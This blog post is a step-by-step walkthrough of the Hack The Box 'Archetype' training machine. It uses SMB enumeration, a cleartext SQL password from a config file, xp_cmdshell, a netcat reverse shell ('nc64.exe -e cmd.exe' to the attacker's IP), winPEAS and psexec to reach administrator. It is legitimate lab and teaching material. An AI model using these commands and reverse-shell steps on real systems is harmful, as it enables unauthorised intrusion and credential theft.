The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Archetype: From user to admin

posted on 21.5.2023 by Below Surface in "Hack The Box"

First, check out the open tcp ports. Exchange ip with the machines IP address.

sudo nmap -sV ip

Let's list the available shares on this machine:

smbclient -L ip

Let's try to open the share "backups":

smbclient \\\\ip\\backups

Then run

ls

to list files and folders. Relevant is this file:

prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

Let's download and open it:

get prod.dtsConfig
ctrl + c // to close the share
cat prod.dtsConfig

Output:

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

We receive a password in clear text (M3g4c0rp123), the user (sql_svc) and the host (ARCHETYPE).

We will use mssqlclient.py of the Impacket tool. Installing it:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
cd examples

Then we run the tool to connect. Exchange ip with your machines IP address

python3 mssqlclient.py ARCHETYPE/sql_svc@ip -windows-auth

Paste in the password from above and hit enter. We are now logged in! Let's check what role we have on the SQL server:

SELECT is_srvrolemember('sysadmin');

The result is "1", which stands for "true". Let's see if xp_cmdshell is activated:

EXEC xp_cmdshell 'net user';

It is not activated yet, so this is what we do now:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

We may now execute system commands, like:

xp_cmdshell "whoami"

This produces the following result:

output              
-----------------   
archetype\sql_svc   

NULL


Now we want to get a reverse shell. For this we want to upload an executable named nc64.exe.

Open a new terminal and start a HTTP server:

cd /Downloads
wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe
ifconfig tun0 //to get the ip address (inet) for a later action
sudo python3 -m http.server 80

Then open yet another terminal and start netcat, to listen on port 443:

sudo nc -lvnp 443

Now we go back to the SQL terminal and run

xp_cmdshell "powershell -c pwd"

The output is something like

NULL                  


Path                  


----                  


C:\Windows\system32   


NULL                  


NULL                  


NULL

We currently don't have the privilege to write in a system directory, so we change the directory to somewhere we can write. We will use the Downloads directory. Please exchange ip with the IP address received from running "ifconfig tun0" before (the inet one).

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://ip/nc64.exe -outfile nc64.exe"

In the terminal with the running HTTP server, it should display something like

ip - - [21/May/2023 12:51:36] "GET /nc64.exe HTTP/1.1" 200 -

Now, run this in the SQL terminal:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe ip 443"

We should now have our reverse shell in the Ncat terminal window:

listening on [any] 443 ...
connect to [10.10.14.126] from (UNKNOWN) [10.129.95.187] 49685
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.


C:\Users\sql_svc\Downloads>

To get the user flag, run

cd ..
cd Desktop
type user.txt


To get the admin flag, we need to do privilege escalation with the winPEAS tool. We will download it the same way, we downloaded the nc64.exe file.

Stop the server, download it and restart the server:

ctrl + c
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
sudo python3 -m http.server 80

Then in the SQL terminal run (exchange ip with the server ip (ifconfig tun0, inet):

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://ip/winPEASx64.exe -outfile winPEASx64.exe"

We can see it worked in the server terminal

ip - - [22/May/2023 14:05:12] "GET /winPEASx64.exe HTTP/1.1" 200 -


Now in the reverse shell terminal window, we can navigate to the executable and run it:

cd ..
cd Downloads
.\winPEASx64.exe

A long output should be prompted. The interesting part is this:

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

So, let's navigate there and view the content.

cd ..
cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
type ConsoleHost_history.txt

Output:

type ConsoleHost_history.txt
net.exe use T: \Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

So now we got the admin password in clear text: MEGACORP_4dm1n!!


Connect (replace ip with your machines IP address:

cd impacked/examples
python3 psexec.py administrator@ip

And get the admin flag:

cd ..
cd ..
cd Users\Administrator\Desktop
type root.txt

Finished!

Tags:

hack the box
nmap
smb
smbclient
mssqlclient
xp_cmdshell
winpeas
psexec

Sources:

https://app.hackthebox.com/starting-pointhttps://www.youtube.com/watch?v=IOAv8IaV5oc

More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or psexec.py

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box